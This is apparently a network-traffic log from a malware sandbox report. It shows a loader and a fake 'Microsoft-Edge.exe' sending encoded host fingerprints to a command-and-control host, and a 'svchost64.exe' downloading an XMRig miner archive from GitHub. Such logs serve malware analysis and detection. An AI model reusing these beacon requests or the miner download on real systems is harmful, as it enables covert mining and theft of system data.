                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:53 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:53 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OISfcW%2BxfPGxO0pK7LckH5Tp3%2Bw4Eb%2Bs%2Fcth36PsqtS0xeyufX4GdlqYanzyIErYpxlKkVTsjQhDzzcKfQcpd%2BE714gbo%2B31kKkruxxorlF6pPEjwy1UqDh83Kjuu00o3G2EwDoW8sFL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b2ffaf7c3f8-EWR
                                                                                                                                                                2024-09-27 15:42:53 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                56192.168.2.449840172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:54 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:54 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:54 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BsKL190etyJ3WuMguAb%2Fnr3NqCULJceT6hMlRaMu0LBzQ14iiJCIvuNY80BSznFnkSqS6o8s%2Bkg5GM0zQeLjffpOKS5UwQMbCmd0TjiLZcQy5X1aZwNZ8ikndm6j5zL922mLdhzMqOTk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b383d644361-EWR
                                                                                                                                                                2024-09-27 15:42:54 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                57192.168.2.449843172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:55 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:56 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:56 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d4EBqw6tLF7hSQKYgVPSfPhyb%2BxlVilm9dvHzzKxya80oBWuThHHouz9CWlFlcVzGiEr3GpdCBUNl9shZ9D%2BuOYmpZIFUa0t%2F3BbgfIeN7F0AcP7B%2FdaZK%2BnHK9vvN6hLPpQk1YCcRrQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b3e48c27cf9-EWR
                                                                                                                                                                2024-09-27 15:42:56 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                58192.168.2.449842140.82.121.34437732C:\Users\user\AppData\Local\Temp\svchost64.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:55 UTC132OUTGET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1
                                                                                                                                                                Host: github.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2024-09-27 15:42:55 UTC583INHTTP/1.1 302 Found
                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:49 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                Access-Control-Allow-Origin:
                                                                                                                                                                Location: https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.zip
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                2024-09-27 15:42:55 UTC3382INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                59192.168.2.449844172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:55 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:56 UTC630INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:56 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=km%2B8M3P5qbr37SeLx%2F8pNfGWoFmyRqVhVZGVXmtGe7es7Dia93HWGF4Xa3Llt%2BRnFrw3iaxmP7HrifF%2F9dGbHDCtokWusIVFNQBQ3Nirs4cp0%2BTch0zn6xMxRPZxsuUOfzl%2B%2F5AmZfbx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b3efbdc43cd-EWR
                                                                                                                                                                2024-09-27 15:42:56 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                60192.168.2.449846172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:56 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:57 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:57 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XW5eF9bUSiGlj50hhCMu7PGjZfPBrsHYrbpperM4RLLfz2fQAmcdBdr9x5s9JsZJDhP4kvgsAIBlNjmvD%2BM9ytVpCMJy9NymFcU7SFR5PZhibmOdfjke2wJ5DPy2sEilH803S%2BeCQEmC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b458e9841cf-EWR
                                                                                                                                                                2024-09-27 15:42:57 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                61192.168.2.449847172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:57 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:57 UTC630INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:57 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mUSuSHk1VXcHRkRDyuLQ7B0UUK%2BNSSUBx4mOPib%2BHx3RK1gEnIvjMznj6GklIW%2F%2B6NLnzfPowJ8OSvD9GstNQ1rX0qzF81Avi2SvmN0d3Tm4WTWXPCISX%2FhwD%2Bcd4EpKSVu%2FSLDCpVn6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b49cfcb7d00-EWR
                                                                                                                                                                2024-09-27 15:42:57 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                62192.168.2.449849172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:58 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:58 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:58 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SR1PQ%2FIPeQoHGmdeSv%2FTe1CJ59mRSyVD19zHAlep8KLNCBdBKO2xjrtuaVS04M3xYuE8DlMU1pa%2Fj7SIHEKAbfQSmd6blYseA9TTbhg%2B0FkBN%2BPqFuuW2%2Fm7pI0jl45PakpgpGcAcK7A"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b4e5aa5c448-EWR
                                                                                                                                                                2024-09-27 15:42:58 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                63192.168.2.449851172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:59 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:59 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:59 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HH3q6cd%2FeA3oiFDBV6seMD7jucHoBLed7TqvCb98UWyX9d2yXdwwa%2BceJjYnkUfiQ81iDD7WS3UhikHkYdjsNOvO5clmU88rPBA6ZooW4QNeT85NbCY1dDlcy7VDsM%2FHIevppq7T6NGC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b536a2e1a0f-EWR
                                                                                                                                                                2024-09-27 15:42:59 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                64192.168.2.449852172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:59 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:59 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:59 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ofPs2OoPCSuTh71LMXzCGE6cHAB3haCmToJgLjeLfzMd5f64EC7%2BWL3D68m91gyM30Ae5DWVXfiMS8p9tbKyrBKmE9pex2H7yJjHE4pbHsBYuYBtKhmib2pl91stUvKKpg7w%2BBO8GIBP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b546b8f8c65-EWR
                                                                                                                                                                2024-09-27 15:42:59 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                65192.168.2.449854172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:43:00 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:43:01 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:01 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NTLuE6%2Br48TgeZDDHxl6lEyT17CDn1YYuz18ISEQGqeWoFyRvv4hAr5jB1M5If%2FILyGjl%2FDG6c2J8t5U8aAB5AQG8sTCQGx9xNuP4fBXwl%2B1TN9r3LMujO3cPwYVwpAhsNTjX9QJ%2Bw0j"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b5e0e00176c-EWR
                                                                                                                                                                2024-09-27 15:43:01 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:43:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                66192.168.2.449855172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
